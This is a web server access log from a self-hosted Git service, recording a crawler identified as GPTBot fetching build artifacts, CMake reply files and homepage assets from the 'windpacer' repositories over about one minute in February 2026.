"/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11173] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:19:53:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html?display=source" [Client 74.7.227.38] [Length 492836] [Gzip 19.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:19:53:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html?display=source" [Client 74.7.227.38] [Length 492043] [Gzip 19.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:19:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html?display=source" [Client 74.7.227.38] [Length 492048] [Gzip 19.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:19:53:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html?display=source" [Client 74.7.227.38] [Length 474069] [Gzip 19.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html?display=source" [Client 74.7.227.38] [Length 474061] [Gzip 19.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html?display=source" [Client 74.7.227.38] [Length 492842] [Gzip 19.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:19:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 31876] [Gzip 12.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:19:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" +[17/Feb/2026:19:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 21635] [Gzip 10.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:19:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 14128] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:19:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 15239] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:19:53:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:19:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:19:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html?display=source" [Client 74.7.227.38] [Length 554573] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:19:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2freply%2findex-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 28462] [Gzip 6.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2freply%2findex-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 28464] [Gzip 6.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:19:53:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html?display=source" [Client 74.7.227.38] [Length 492012] [Gzip 19.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:19:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:19:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:19:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:19:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:19:53:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html?display=source" [Client 74.7.227.38] [Length 474034] [Gzip 19.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html?display=source" [Client 74.7.227.38] [Length 492803] [Gzip 19.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:19:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html?display=rendered" [Client 74.7.227.38] [Length 10987] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" +[17/Feb/2026:19:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" +[17/Feb/2026:19:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:19:53:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11178] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:19:53:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt?display=rendered" [Client 74.7.227.38] [Length 11186] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt?display=rendered" [Client 74.7.227.38] [Length 11185] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt?display=rendered" [Client 74.7.227.38] [Length 11185] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt?display=source" [Client 74.7.227.38] [Length 14301] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:19:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt?display=source" [Client 74.7.227.38] [Length 14300] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:19:53:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt?display=source" [Client 74.7.227.38] [Length 14018] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:53:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14331] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:53:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14332] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" +[17/Feb/2026:19:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs?display=rendered" [Client 74.7.227.38] [Length 11221] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:19:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14333] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/css" [Client 74.7.227.38] [Length 10347] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets" +[17/Feb/2026:19:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg?display=rendered" [Client 74.7.227.38] [Length 11109] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:19:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg?display=rendered" [Client 74.7.227.38] [Length 11108] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:19:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg?display=rendered" [Client 74.7.227.38] [Length 11108] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 